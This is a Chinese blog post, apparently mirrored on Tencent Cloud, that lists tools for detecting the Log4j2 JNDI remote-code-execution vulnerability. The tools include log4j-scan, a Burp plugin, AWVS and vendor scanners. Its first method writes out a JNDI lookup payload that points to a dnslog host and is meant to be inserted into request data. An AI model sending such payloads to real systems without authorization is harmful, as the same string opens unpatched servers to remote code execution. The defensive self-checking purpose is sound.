前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Log4j2 漏洞检测工具清单

Log4j2 漏洞检测工具清单

作者头像
Bypass
发布2022-04-19 09:32:00
3.9K0
发布2022-04-19 09:32:00
举报
文章被收录于专栏:Bypass

距离Log4j2漏洞公开已经过去一个月了,它所造成的严重影响已经不需要我们重复提及了。随着时间的推移,新的漏洞会不断出现,旧的漏洞会不断消失,而这个Log4j2中的RCE漏洞可能需要好几年的时间才能得到解决。所以,在接下来的一段时间里,这个漏洞依然是我们需要去关注的重点。

本文收集和整理了几种漏洞检测方式和工具,以用于Log4j2漏洞检测和自查。


1、dnslog手动验证方法

首先在dnslog平台获取一个子域名,尝试构造payload,插入请求数据包。

代码语言:javascript
复制
${jndi:ldap://bypass.fzuqgl.ceye.io}

通过dnslog平台是否收到请求,初步判断目标环境是否存在漏洞。

2、Log4j-scan

一款用于查找log4j2漏洞的python脚本,支持url检测,支持HTTP请求头和POST数据参数进行模糊测试。

github项目地址:

代码语言:javascript
复制
https://github.com/fullhunt/log4j-scan

3、Log4j2 burp被动扫描插件

通过插件的方式,将lLog4j2漏洞检测能力集成到burp,从而提升安全测试人员的漏洞发现能力。

github项目地址:

代码语言:javascript
复制
https://github.com/f0ng/log4j2burpscanner

Log4j2 burp被动扫描插件效果:

4、AWVS扫描log4j2漏洞

AWVS14最新版本支持Log4j2漏洞检测,支持批量扫描,漏洞扫描神器是不会让你失望的,准备更新武器库吧。

5、制品级Log4j2漏洞检测工具

本检测工具基于腾讯安全的binAuditor,支持 Jar/Ear/War包上传,一键上传即可获取到检测结果。

检测地址:

代码语言:javascript
复制
https://bsca.ms.qq.com/

Jar包检测结果:

6、Log4j2 本地检测工具

基于长亭牧云产品提取出来的Log4j2本地检测工具,可快速发现当前服务器存在风险的 log4j2 应用。

Log4j2 漏洞检测工具地址:

代码语言:javascript
复制
https://log4j2-detector.chaitin.cn/

7、360 Log4j2检测工具包

浏览器被动式扫描+本地检测工具,提供了一个完整的Log4j2漏洞检测方案,另外,工具包还包含了Log4j2补丁方案,如下图:

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-01-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Bypass 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
检测工具
域名服务检测工具(Detection Tools)提供了全面的智能化域名诊断,包括Whois、DNS生效等特性检测,同时提供SSL证书相关特性检测,保障您的域名和网站健康。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档